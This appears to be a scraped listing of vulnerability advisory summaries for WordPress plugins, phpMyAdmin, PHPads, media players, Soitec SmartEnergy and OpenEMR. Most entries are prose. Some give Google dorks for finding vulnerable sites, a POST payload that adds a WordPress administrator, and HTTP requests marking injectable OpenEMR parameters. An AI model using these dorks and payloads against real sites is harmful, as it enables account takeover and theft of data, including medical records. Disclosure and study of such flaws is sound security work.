The upload function located on "/wp-symposium/server/file_upload_form.php" is protected, however, "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension. The same vulnerable files are located in "/wp-symposium/mobile-files/server/php/". Dork google: index of "wp-symposium"
This web application is vulnerable to Cross Site Scripting (XSS). XSS is caused when an application echoes user controllable input data back to the browser without first sanitising or escaping dangerous characters. Unescaped strings are then interpreted or executed by the browser as script, just as if they had originated from the web server. Malicious script is sent by the attacker via the vulnerable web application and executed on the victims browser, within the context of that user and may be used to steal session information, redirect users to a malicious site, and even steal credentials in a Phishing attack.
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to cause a denial of service (resource consumption) via a long password.
This exploit allows an attacker to bypass authentication and change the administrator password of a vulnerable PHPads installation. The exploit works by first retrieving the username and password from the ads.dat file, then using those credentials to access the admin.php?action=config page and change the password to 'htlover'.
The vulnerable function is located on "/download-manager/wpdm-core.php" file. Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook). wpdm_ajax_call_exec() call functions by call_user_func() through POST data. Evil POST Data (Add new Wordpress Administrator): action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator. Dork google: index of "wordpress-download".
A buffer overflow vulnerability exists in Jaangle 0.98i.977, which could allow an attacker to cause a denial of service condition. The vulnerability is due to a lack of proper validation of user-supplied input when handling specially crafted .m3u files. An attacker can exploit this vulnerability by creating a malicious .m3u file containing a large amount of data and sending it to the target system. Successful exploitation of this vulnerability could result in a denial of service condition.
A buffer overflow vulnerability exists in Mediacoder 0.8.33 build 5680 when a specially crafted .lst file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to the application not properly validating the length of user-supplied data before copying it to a fixed-length buffer. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .lst file.
Mediacoder 0.8.33 build 5680 is vulnerable to a SEH buffer overflow exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The file contains a malicious URL with 845 A characters followed by 4 B characters, 4 C characters, and 60 D characters. When the file is opened, the SEH handler is overwritten and the application crashes.
Soitec SmartEnergy web application suffers from an authentication bypass vulnerability using SQL Injection attack in the login script. The script fails to sanitize the 'login' POST parameter allowing the attacker to bypass the security mechanism and view sensitive information that can be further used in a social engineering attack.
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections: Request 1 POST /openemr/interface/super/edit_layout.php HTTP/1.1 Host: 192.168.56.102 [...] Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7 [...] Content-Length: 134 formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection> Request 2 POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1 Host: 192.168.56.102 [...] Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0 [...] Content-Length: 135 form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection> Request 3 POST /openemr/interface/billing/edit_payment.php HTTP/1.1 Host: 192.168.56.102 [...] Content-Length: 186 Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection*gt;&ParentPage=&hidden_patient_code=&global_amount=&mode= Request 4 GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1 Host: 192.168.56.102 [...] Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0 Connection: keep-alive Request 5 POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1 Host: 192.168.56.102 [...] Content-Length: 135 Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>
Services By CQR